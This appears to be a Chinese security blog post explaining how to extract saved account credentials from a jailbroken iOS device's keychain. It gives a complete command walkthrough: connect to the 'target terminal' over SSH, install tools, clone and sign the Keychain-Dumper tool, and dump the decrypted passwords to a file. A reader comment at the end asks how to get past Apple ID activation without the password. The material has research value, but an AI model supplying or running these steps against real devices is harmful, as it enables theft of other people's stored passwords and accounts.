从越狱iOS设备中提取用户帐号与密码
From:小生@silic security
在iOS设备中,所有应用程序中需要输入的帐号与密码并不是储存在Applications中,而是储存在/var/Keychains/keychain-2.db中。
当然,我们可以用一些数据库管理软件打开这个文件,毕竟这是个SQLite文件,但尝试后你会发现这个db中的密码是被加密的,无法直接读取。
这时,我们便要借助大神们的工具了!
首先,用ssh连接目标终端,接着输入下列代码:
apt-get update
apt-get install ldid git less #安装所需工具
git clone git://github.com/ptoomey3/Keychain-Dumper.git #从github下载解密Keychains的软件包
cd Keychain-Dumper
cp keychain_dumper /usr/bin
keychain_dumper -e >/var/tmp/entitlements.xml #将目标终端的Keychains数据转储到entitlements.xml
ldid -S /var/tmp/entitlements.xml keychain_dumper #为keychain_dumper注册
keychain_dumper>keychainresults.txt #开始解密,并将结果输出到keychainresults.txt
cat keychainresults.txt | less #通过less显示解密后的结果(空格下翻页,d键上翻页,q键退出)
我是用自己的iPod Touch 4 (iOS 6.1.2)进行的示范,其中显示出明文密码的是我曾经连接过的一个无线热点。
但尝试过的同学会发现结果中有部分密文没有被破解,这是因为此软件当初是针对iOS4系统编写的,之后也很久没有更新,再加上软件开发商对用户安全的日益重视,使得破解密码越来越困难,有兴趣的大神可以研究一下这个软件,或许能够想到改善的方法。
请问一下 iphone5 7.4 的开机需要激活Apple iD ,密码忘记,邮箱不知,请问如何激活|?